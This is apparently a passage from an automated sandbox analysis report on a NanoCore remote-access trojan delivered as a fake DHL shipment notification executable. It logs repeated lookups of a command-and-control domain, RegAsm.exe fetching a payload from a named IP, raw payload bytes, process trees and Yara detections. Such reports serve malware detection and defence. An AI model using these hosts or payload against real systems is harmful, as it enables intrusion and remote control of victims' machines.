            Sep 27, 2021 13:14:44.839030981 CEST8.8.8.8192.168.11.200xaa9eNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:50.839839935 CEST8.8.8.8192.168.11.200x9443No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:14:56.758558989 CEST8.8.8.8192.168.11.200xe6f3No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:02.647368908 CEST8.8.8.8192.168.11.200xc28dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:08.575143099 CEST8.8.8.8192.168.11.200x56abNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:14.474417925 CEST8.8.8.8192.168.11.200x940dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:20.458604097 CEST8.8.8.8192.168.11.200xc2b3No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:26.383125067 CEST8.8.8.8192.168.11.200x2796No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:32.286077023 CEST8.8.8.8192.168.11.200x7a2aNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:38.328910112 CEST8.8.8.8192.168.11.200xb3eNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:43.365478039 CEST1.1.1.1192.168.11.200xff71No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
            Sep 27, 2021 13:15:44.232429981 CEST8.8.8.8192.168.11.200x87e2No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:50.151885986 CEST8.8.8.8192.168.11.200xb887No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:15:56.152004004 CEST8.8.8.8192.168.11.200xe431No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:02.087193966 CEST8.8.8.8192.168.11.200xb186No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:08.058150053 CEST8.8.8.8192.168.11.200x8fbeNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:14.085480928 CEST8.8.8.8192.168.11.200x5be9No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:19.976174116 CEST8.8.8.8192.168.11.200xd39No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:25.958165884 CEST8.8.8.8192.168.11.200x728dNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:31.894812107 CEST8.8.8.8192.168.11.200xe77aNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:37.842606068 CEST8.8.8.8192.168.11.200xf6cdNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:43.832395077 CEST8.8.8.8192.168.11.200x18ecNo error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:49.764617920 CEST8.8.8.8192.168.11.200x1478No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)
            Sep 27, 2021 13:16:55.729880095 CEST8.8.8.8192.168.11.200xa444No error (0)septnan.duckdns.org193.104.197.28A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • 178.32.63.50

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.11.2049719178.32.63.5080C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            TimestampkBytes transferredDirectionData
            Sep 27, 2021 13:09:17.991836071 CEST432OUTGET /moss/nancata_RbkGW109.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: 178.32.63.50
            Cache-Control: no-cache
            Sep 27, 2021 13:09:18.009867907 CEST433INHTTP/1.1 200 OK
            Date: Mon, 27 Sep 2021 11:09:17 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
            Last-Modified: Sun, 26 Sep 2021 18:15:43 GMT
            ETag: "32a40-5cce9f7f9e585"
            Accept-Ranges: bytes
            Content-Length: 207424
            Content-Type: application/octet-stream
            Data Raw: e0 c0 3d 70 a7 8b f9 0b b1 2c ab fe 80 ab 07 da 79 43 01 3a a5 ae e7 e6 8e fa 15 ec 18 3c f1 80 df a0 6c 44 8d 86 7e f1 46 ac 67 bd f2 2c fa 8b 11 f7 ff 7c 9e 53 83 da d6 f0 2f e9 e6 8d 54 8b 7d f6 53 fe 89 95 57 89 93 ae 11 92 01 4c f2 d2 fe 77 6f 52 17 2b 41 c8 25 ce c1 a4 d3 79 30 3d e3 3f 64 8a ab 99 32 f1 5f 90 d9 4d 49 f4 59 df 5d aa a2 14 7e ff dc 92 1b b5 77 dd 49 1d 12 55 24 41 63 6b 8b 0e ea 46 17 0a 1b c6 88 2d 5d 5e f2 ee e1 08 3e 17 df af 69 78 78 f2 a8 91 25 77 4c 78 ed 01 a0 3c b7 18 33 75 91 67 6f 3d 77 80 1c 9f e3 dd 1e ce 07 53 30 95 2e e8 1a d1 48 f2 67 f6 39 5d 7c 48 fe 44 35 9a fd 88 8f ca c8 39 9f d9 ed 03 69 82 8f 96 e3 29 03 a8 5f 01 e3 00 07 f1 5e f8 e9 1a 6e 44 f3 8e 35 25 3d 81 2c 61 75 92 96 6d 3a ef 23 69 de 02 05 e0 ab 4f 13 dd 1c 17 73 78 19 36 92 a2 1b 90 24 3b ca f4 9f 37 6f 8d 97 43 0e 90 f7 56 5b ab 52 83 22 3a 89 d7 d0 cd fb 07 37 69 8b 5f 18 24 cf ef ae cc 56 0b d7 77 50 af be f0 3a 85 5d 77 0e 47 5c f5 17 4a d8 11 59 0d 20 34 c4 4c 40 af c0 36 90 ac d2 92 06 bf 0c 1a 25 af 85 1d 0b d1 9d 85 56 b2 91 62 45 94 c8 3d af e0 30 16 6d e1 b5 ea 0e 8e 93 5d c4 a3 45 32 c0 e8 04 87 77 7b d7 65 3a 81 df e9 86 cf 72 95 6c 23 df a7 99 bd 31 e8 de 61 72 a3 1e ad 34 42 1d 9c 70 9f d4 f5 79 13 a0 36 11 6d 9f 24 37 2a 69 58 81 60 25 68 7f 22 a4 af f6 2a 51 94 14 32 84 40 b5 ee 49 09 55 23 3f 90 0f eb f3 e5 63 18 0f 3f 6e 29 d6 ea c9 86 e1 a6 f5 c4 04 77 94 f5 ea 85 59 be c3 32 0e 3d e6 5c 4d 9e 18 92 d0 7f 50 cc 8e 97 85 f7 e9 f6 8e cd 2a dd 99 95 d9 a7 ee 21 c1 82 cd 9a 30 8f 3c fb 05 70 ab 95 8c a0 a8 96 e1 b8 a7 1f 13 c2 bf 07 ed 58 dd 67 63 bb 5b 95 55 9a 88 e7 cb 83 0a 88 0e e1 30 1e 38 c4 0b f0 0f c0 ce b9 ba b9 f6 db 2c b9 66 72 8a ad 47 d9 49 a8 20 86 b0 1d 5b d2 55 d9 b9 63 33 b8 96 64 9c 18 07 b0 5d fd 3a 8f 83 32 5a 66 cd ee e7 e3 2c f3 bd 07 7b 1d e8 7c 71 e8 a4 45 4c f0 e5 d3 aa eb 8d 3e 41 6c 73 94 bf c2 e4 4d 55 ac e2 16 7f c8 88 e8 bb 13 54 05 ef 40 95 a6 86 ed ff 11 3a 62 7e c0 c8 68 dc 0d 81 1a ed 38 d2 95 9a da f4 93 24 7a 42 0c 3b 38 ec 2c ee 07 75 65 a1 17 a0 67 0e 7d 9e e2 1f 9e 01 df 3c a3 7d a0 6c 67 06 8a da d5 a3 b4 f4 7f ad fa 48 92 09 02 f2 05 6c 6a d5 cb 76 0c bc 42 f6 21 cd 1f c0 58 ea 17 fa 6d 31 73 d7 f7 be 28 df 4a 66 b1 32 34 09 d3 b1 43 97 6c 11 1b 63 16 a1 14 4d 6f 3a 29 9b b1 eb e0 ef 58 6d d4 54 f3 93 b3 db 46 99 2b 3f c5 37 94 33 99 04 10 26 60 55 06 f6 b4 c9 d2 a3 1f dd 12 e3 e9 68 d9 cd b7 d8 ea 2e f0 b2 8e 79 a4 9a 8e 76 b1 3f d9 5f 4c 2e 2f 54 1c 23 8b 4b 13 a1 7b 4c 75 0d 7f 63 61 36 78 fb fb 2e 55 20 9e cb 54 b5 90 6f ce f3 9d 2f 17 be 10 42 79 05 5f 90 c3 fe 80 bf 57 9a a7 af 11 99 fe b3 f2 d1 46 77 7e 2c 15 2b 41 cc 0a f3 c1 a4 d9 53 30 2e d3 3e 64 81 ab 99 32 f5 5f 90 c8 33 4a f4 59 db 32 94 a2 14 74 d5 dc 81 2b b4 77 d6 c9 1d 12 50 2a 5e c8 1b 8f ba e3 8f 59 8d 1a 8a 4f 26 09 25 ab 9c c1 73 4c 78 b8 db 08 15 49 ef cc ff 4b 1c 57 18 8f 64 8a 64 c2 75 23 16 ff 48 2b 72 24 a0 71 f0 87 ba 2b dd 27 5e 32 bd 6f e8 1a db 62 d4 1c 44 39 4e 00 4b fd 60 94 bd 14 db 8f ca d9 47 dd d9 ed 09 05 85 81 97 f3 05 17 80 5e c9 e2 2b 1e bc 5c de c2 1d ee 06 61 69 3e 0e 3d df 6e 61 75 98 be 6e 0a e5 63 66 de 22 05 e0 ab 4d 13 df 00 02 5e 7f 3f 1e d3 a2 1f 9a 0e 1d e1 03 9f 24 5f 0e 94
            Data Ascii: =p,yC:<lD~Fg,|S/T}SWLwoR+A%y0=?d2_MIY]~wIU$AckF-]^>ixx%wLx<3ugo=wS0.Hg9]|HD59i)_^nD5%=,aum:#iOsx6$;7oCV[R":7i_$VwP:]wG\JY 4L@6%VbE=0m]E2w{e:rl#1ar4Bpy6m$7*iX`%h"*Q2@IU#?c?n)wY2=\MP*!0<pXgc[U08,frGI [Uc3d]:2Zf,{|qEL>AlsMUT@:b~h8$zB;8,ueg}<}lgHljvB!Xm1s(Jf24ClcMo:)XmTF+?73&`Uh.yv?_L./T#K{Luca6x.U To/By_WFw~,+AS0.>d2_3JY2t+wP*^YO&%sLxIKWddu#H+r$q+'^2obD9NK`G^+\ai>=nauncf"M^?$_


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.11.2049747178.32.63.5080C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            TimestampkBytes transferredDirectionData
            Sep 27, 2021 13:10:20.326961040 CEST1208OUTGET /moss/nancata_RbkGW109.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: 178.32.63.50
            Cache-Control: no-cache
            Sep 27, 2021 13:10:20.344475985 CEST1209INHTTP/1.1 200 OK
            Date: Mon, 27 Sep 2021 11:10:20 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
            Last-Modified: Sun, 26 Sep 2021 18:15:43 GMT
            ETag: "32a40-5cce9f7f9e585"
            Accept-Ranges: bytes
            Content-Length: 207424
            Content-Type: application/octet-stream
            Data Raw: e0 c0 3d 70 a7 8b f9 0b b1 2c ab fe 80 ab 07 da 79 43 01 3a a5 ae e7 e6 8e fa 15 ec 18 3c f1 80 df a0 6c 44 8d 86 7e f1 46 ac 67 bd f2 2c fa 8b 11 f7 ff 7c 9e 53 83 da d6 f0 2f e9 e6 8d 54 8b 7d f6 53 fe 89 95 57 89 93 ae 11 92 01 4c f2 d2 fe 77 6f 52 17 2b 41 c8 25 ce c1 a4 d3 79 30 3d e3 3f 64 8a ab 99 32 f1 5f 90 d9 4d 49 f4 59 df 5d aa a2 14 7e ff dc 92 1b b5 77 dd 49 1d 12 55 24 41 63 6b 8b 0e ea 46 17 0a 1b c6 88 2d 5d 5e f2 ee e1 08 3e 17 df af 69 78 78 f2 a8 91 25 77 4c 78 ed 01 a0 3c b7 18 33 75 91 67 6f 3d 77 80 1c 9f e3 dd 1e ce 07 53 30 95 2e e8 1a d1 48 f2 67 f6 39 5d 7c 48 fe 44 35 9a fd 88 8f ca c8 39 9f d9 ed 03 69 82 8f 96 e3 29 03 a8 5f 01 e3 00 07 f1 5e f8 e9 1a 6e 44 f3 8e 35 25 3d 81 2c 61 75 92 96 6d 3a ef 23 69 de 02 05 e0 ab 4f 13 dd 1c 17 73 78 19 36 92 a2 1b 90 24 3b ca f4 9f 37 6f 8d 97 43 0e 90 f7 56 5b ab 52 83 22 3a 89 d7 d0 cd fb 07 37 69 8b 5f 18 24 cf ef ae cc 56 0b d7 77 50 af be f0 3a 85 5d 77 0e 47 5c f5 17 4a d8 11 59 0d 20 34 c4 4c 40 af c0 36 90 ac d2 92 06 bf 0c 1a 25 af 85 1d 0b d1 9d 85 56 b2 91 62 45 94 c8 3d af e0 30 16 6d e1 b5 ea 0e 8e 93 5d c4 a3 45 32 c0 e8 04 87 77 7b d7 65 3a 81 df e9 86 cf 72 95 6c 23 df a7 99 bd 31 e8 de 61 72 a3 1e ad 34 42 1d 9c 70 9f d4 f5 79 13 a0 36 11 6d 9f 24 37 2a 69 58 81 60 25 68 7f 22 a4 af f6 2a 51 94 14 32 84 40 b5 ee 49 09 55 23 3f 90 0f eb f3 e5 63 18 0f 3f 6e 29 d6 ea c9 86 e1 a6 f5 c4 04 77 94 f5 ea 85 59 be c3 32 0e 3d e6 5c 4d 9e 18 92 d0 7f 50 cc 8e 97 85 f7 e9 f6 8e cd 2a dd 99 95 d9 a7 ee 21 c1 82 cd 9a 30 8f 3c fb 05 70 ab 95 8c a0 a8 96 e1 b8 a7 1f 13 c2 bf 07 ed 58 dd 67 63 bb 5b 95 55 9a 88 e7 cb 83 0a 88 0e e1 30 1e 38 c4 0b f0 0f c0 ce b9 ba b9 f6 db 2c b9 66 72 8a ad 47 d9 49 a8 20 86 b0 1d 5b d2 55 d9 b9 63 33 b8 96 64 9c 18 07 b0 5d fd 3a 8f 83 32 5a 66 cd ee e7 e3 2c f3 bd 07 7b 1d e8 7c 71 e8 a4 45 4c f0 e5 d3 aa eb 8d 3e 41 6c 73 94 bf c2 e4 4d 55 ac e2 16 7f c8 88 e8 bb 13 54 05 ef 40 95 a6 86 ed ff 11 3a 62 7e c0 c8 68 dc 0d 81 1a ed 38 d2 95 9a da f4 93 24 7a 42 0c 3b 38 ec 2c ee 07 75 65 a1 17 a0 67 0e 7d 9e e2 1f 9e 01 df 3c a3 7d a0 6c 67 06 8a da d5 a3 b4 f4 7f ad fa 48 92 09 02 f2 05 6c 6a d5 cb 76 0c bc 42 f6 21 cd 1f c0 58 ea 17 fa 6d 31 73 d7 f7 be 28 df 4a 66 b1 32 34 09 d3 b1 43 97 6c 11 1b 63 16 a1 14 4d 6f 3a 29 9b b1 eb e0 ef 58 6d d4 54 f3 93 b3 db 46 99 2b 3f c5 37 94 33 99 04 10 26 60 55 06 f6 b4 c9 d2 a3 1f dd 12 e3 e9 68 d9 cd b7 d8 ea 2e f0 b2 8e 79 a4 9a 8e 76 b1 3f d9 5f 4c 2e 2f 54 1c 23 8b 4b 13 a1 7b 4c 75 0d 7f 63 61 36 78 fb fb 2e 55 20 9e cb 54 b5 90 6f ce f3 9d 2f 17 be 10 42 79 05 5f 90 c3 fe 80 bf 57 9a a7 af 11 99 fe b3 f2 d1 46 77 7e 2c 15 2b 41 cc 0a f3 c1 a4 d9 53 30 2e d3 3e 64 81 ab 99 32 f5 5f 90 c8 33 4a f4 59 db 32 94 a2 14 74 d5 dc 81 2b b4 77 d6 c9 1d 12 50 2a 5e c8 1b 8f ba e3 8f 59 8d 1a 8a 4f 26 09 25 ab 9c c1 73 4c 78 b8 db 08 15 49 ef cc ff 4b 1c 57 18 8f 64 8a 64 c2 75 23 16 ff 48 2b 72 24 a0 71 f0 87 ba 2b dd 27 5e 32 bd 6f e8 1a db 62 d4 1c 44 39 4e 00 4b fd 60 94 bd 14 db 8f ca d9 47 dd d9 ed 09 05 85 81 97 f3 05 17 80 5e c9 e2 2b 1e bc 5c de c2 1d ee 06 61 69 3e 0e 3d df 6e 61 75 98 be 6e 0a e5 63 66 de 22 05 e0 ab 4d 13 df 00 02 5e 7f 3f 1e d3 a2 1f 9a 0e 1d e1 03 9f 24 5f 0e 94
            Data Ascii: =p,yC:<lD~Fg,|S/T}SWLwoR+A%y0=?d2_MIY]~wIU$AckF-]^>ixx%wLx<3ugo=wS0.Hg9]|HD59i)_^nD5%=,aum:#iOsx6$;7oCV[R":7i_$VwP:]wG\JY 4L@6%VbE=0m]E2w{e:rl#1ar4Bpy6m$7*iX`%h"*Q2@IU#?c?n)wY2=\MP*!0<pXgc[U08,frGI [Uc3d]:2Zf,{|qEL>AlsMUT@:b~h8$zB;8,ueg}<}lgHljvB!Xm1s(Jf24ClcMo:)XmTF+?73&`Uh.yv?_L./T#K{Luca6x.U To/By_WFw~,+AS0.>d2_3JY2t+wP*^YO&%sLxIKWddu#H+r$q+'^2obD9NK`G^+\ai>=nauncf"M^?$_


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.11.2049749178.32.63.5080C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            TimestampkBytes transferredDirectionData
            Sep 27, 2021 13:10:27.439887047 CEST1431OUTGET /moss/nancata_RbkGW109.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: 178.32.63.50
            Cache-Control: no-cache
            Sep 27, 2021 13:10:27.457295895 CEST1432INHTTP/1.1 200 OK
            Date: Mon, 27 Sep 2021 11:10:27 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
            Last-Modified: Sun, 26 Sep 2021 18:15:43 GMT
            ETag: "32a40-5cce9f7f9e585"
            Accept-Ranges: bytes
            Content-Length: 207424
            Content-Type: application/octet-stream
            Data Raw: e0 c0 3d 70 a7 8b f9 0b b1 2c ab fe 80 ab 07 da 79 43 01 3a a5 ae e7 e6 8e fa 15 ec 18 3c f1 80 df a0 6c 44 8d 86 7e f1 46 ac 67 bd f2 2c fa 8b 11 f7 ff 7c 9e 53 83 da d6 f0 2f e9 e6 8d 54 8b 7d f6 53 fe 89 95 57 89 93 ae 11 92 01 4c f2 d2 fe 77 6f 52 17 2b 41 c8 25 ce c1 a4 d3 79 30 3d e3 3f 64 8a ab 99 32 f1 5f 90 d9 4d 49 f4 59 df 5d aa a2 14 7e ff dc 92 1b b5 77 dd 49 1d 12 55 24 41 63 6b 8b 0e ea 46 17 0a 1b c6 88 2d 5d 5e f2 ee e1 08 3e 17 df af 69 78 78 f2 a8 91 25 77 4c 78 ed 01 a0 3c b7 18 33 75 91 67 6f 3d 77 80 1c 9f e3 dd 1e ce 07 53 30 95 2e e8 1a d1 48 f2 67 f6 39 5d 7c 48 fe 44 35 9a fd 88 8f ca c8 39 9f d9 ed 03 69 82 8f 96 e3 29 03 a8 5f 01 e3 00 07 f1 5e f8 e9 1a 6e 44 f3 8e 35 25 3d 81 2c 61 75 92 96 6d 3a ef 23 69 de 02 05 e0 ab 4f 13 dd 1c 17 73 78 19 36 92 a2 1b 90 24 3b ca f4 9f 37 6f 8d 97 43 0e 90 f7 56 5b ab 52 83 22 3a 89 d7 d0 cd fb 07 37 69 8b 5f 18 24 cf ef ae cc 56 0b d7 77 50 af be f0 3a 85 5d 77 0e 47 5c f5 17 4a d8 11 59 0d 20 34 c4 4c 40 af c0 36 90 ac d2 92 06 bf 0c 1a 25 af 85 1d 0b d1 9d 85 56 b2 91 62 45 94 c8 3d af e0 30 16 6d e1 b5 ea 0e 8e 93 5d c4 a3 45 32 c0 e8 04 87 77 7b d7 65 3a 81 df e9 86 cf 72 95 6c 23 df a7 99 bd 31 e8 de 61 72 a3 1e ad 34 42 1d 9c 70 9f d4 f5 79 13 a0 36 11 6d 9f 24 37 2a 69 58 81 60 25 68 7f 22 a4 af f6 2a 51 94 14 32 84 40 b5 ee 49 09 55 23 3f 90 0f eb f3 e5 63 18 0f 3f 6e 29 d6 ea c9 86 e1 a6 f5 c4 04 77 94 f5 ea 85 59 be c3 32 0e 3d e6 5c 4d 9e 18 92 d0 7f 50 cc 8e 97 85 f7 e9 f6 8e cd 2a dd 99 95 d9 a7 ee 21 c1 82 cd 9a 30 8f 3c fb 05 70 ab 95 8c a0 a8 96 e1 b8 a7 1f 13 c2 bf 07 ed 58 dd 67 63 bb 5b 95 55 9a 88 e7 cb 83 0a 88 0e e1 30 1e 38 c4 0b f0 0f c0 ce b9 ba b9 f6 db 2c b9 66 72 8a ad 47 d9 49 a8 20 86 b0 1d 5b d2 55 d9 b9 63 33 b8 96 64 9c 18 07 b0 5d fd 3a 8f 83 32 5a 66 cd ee e7 e3 2c f3 bd 07 7b 1d e8 7c 71 e8 a4 45 4c f0 e5 d3 aa eb 8d 3e 41 6c 73 94 bf c2 e4 4d 55 ac e2 16 7f c8 88 e8 bb 13 54 05 ef 40 95 a6 86 ed ff 11 3a 62 7e c0 c8 68 dc 0d 81 1a ed 38 d2 95 9a da f4 93 24 7a 42 0c 3b 38 ec 2c ee 07 75 65 a1 17 a0 67 0e 7d 9e e2 1f 9e 01 df 3c a3 7d a0 6c 67 06 8a da d5 a3 b4 f4 7f ad fa 48 92 09 02 f2 05 6c 6a d5 cb 76 0c bc 42 f6 21 cd 1f c0 58 ea 17 fa 6d 31 73 d7 f7 be 28 df 4a 66 b1 32 34 09 d3 b1 43 97 6c 11 1b 63 16 a1 14 4d 6f 3a 29 9b b1 eb e0 ef 58 6d d4 54 f3 93 b3 db 46 99 2b 3f c5 37 94 33 99 04 10 26 60 55 06 f6 b4 c9 d2 a3 1f dd 12 e3 e9 68 d9 cd b7 d8 ea 2e f0 b2 8e 79 a4 9a 8e 76 b1 3f d9 5f 4c 2e 2f 54 1c 23 8b 4b 13 a1 7b 4c 75 0d 7f 63 61 36 78 fb fb 2e 55 20 9e cb 54 b5 90 6f ce f3 9d 2f 17 be 10 42 79 05 5f 90 c3 fe 80 bf 57 9a a7 af 11 99 fe b3 f2 d1 46 77 7e 2c 15 2b 41 cc 0a f3 c1 a4 d9 53 30 2e d3 3e 64 81 ab 99 32 f5 5f 90 c8 33 4a f4 59 db 32 94 a2 14 74 d5 dc 81 2b b4 77 d6 c9 1d 12 50 2a 5e c8 1b 8f ba e3 8f 59 8d 1a 8a 4f 26 09 25 ab 9c c1 73 4c 78 b8 db 08 15 49 ef cc ff 4b 1c 57 18 8f 64 8a 64 c2 75 23 16 ff 48 2b 72 24 a0 71 f0 87 ba 2b dd 27 5e 32 bd 6f e8 1a db 62 d4 1c 44 39 4e 00 4b fd 60 94 bd 14 db 8f ca d9 47 dd d9 ed 09 05 85 81 97 f3 05 17 80 5e c9 e2 2b 1e bc 5c de c2 1d ee 06 61 69 3e 0e 3d df 6e 61 75 98 be 6e 0a e5 63 66 de 22 05 e0 ab 4d 13 df 00 02 5e 7f 3f 1e d3 a2 1f 9a 0e 1d e1 03 9f 24 5f 0e 94
            Data Ascii: =p,yC:<lD~Fg,|S/T}SWLwoR+A%y0=?d2_MIY]~wIU$AckF-]^>ixx%wLx<3ugo=wS0.Hg9]|HD59i)_^nD5%=,aum:#iOsx6$;7oCV[R":7i_$VwP:]wG\JY 4L@6%VbE=0m]E2w{e:rl#1ar4Bpy6m$7*iX`%h"*Q2@IU#?c?n)wY2=\MP*!0<pXgc[U08,frGI [Uc3d]:2Zf,{|qEL>AlsMUT@:b~h8$zB;8,ueg}<}lgHljvB!Xm1s(Jf24ClcMo:)XmTF+?73&`Uh.yv?_L./T#K{Luca6x.U To/By_WFw~,+AS0.>d2_3JY2t+wP*^YO&%sLxIKWddu#H+r$q+'^2obD9NK`G^+\ai>=nauncf"M^?$_


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:13:08:28
            Start date:27/09/2021
            Path:C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
            Imagebase:0x400000
            File size:94208 bytes
            MD5 hash:CD65994E4F53363527E3651759103759
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Reputation:low

            General

            Start time:13:08:52
            Start date:27/09/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
            Imagebase:0x600000
            File size:53248 bytes
            MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:low

            General

            Start time:13:08:52
            Start date:27/09/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff76c5b0000
            File size:875008 bytes
            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Start time:13:09:28
            Start date:27/09/2021
            Path:C:\Users\user\Driftigt\Rotacism6.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Driftigt\Rotacism6.exe'
            Imagebase:0x400000
            File size:94208 bytes
            MD5 hash:CD65994E4F53363527E3651759103759
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:Visual Basic
            Antivirus matches:
            • Detection: 13%, ReversingLabs
            Reputation:low

            General

            Start time:13:09:36
            Start date:27/09/2021
            Path:C:\Users\user\Driftigt\Rotacism6.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Driftigt\Rotacism6.exe'
            Imagebase:0x400000
            File size:94208 bytes
            MD5 hash:CD65994E4F53363527E3651759103759
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:Visual Basic
            Reputation:low

            General

            Start time:13:09:53
            Start date:27/09/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Driftigt\Rotacism6.exe'
            Imagebase:0x2c0000
            File size:53248 bytes
            MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Start time:13:09:53
            Start date:27/09/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Driftigt\Rotacism6.exe'
            Imagebase:0x850000
            File size:53248 bytes
            MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:13:09:53
            Start date:27/09/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff76c5b0000
            File size:875008 bytes
            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Start time:13:10:00
            Start date:27/09/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Driftigt\Rotacism6.exe'
            Imagebase:0x8b0000
            File size:53248 bytes
            MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:13:10:01
            Start date:27/09/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
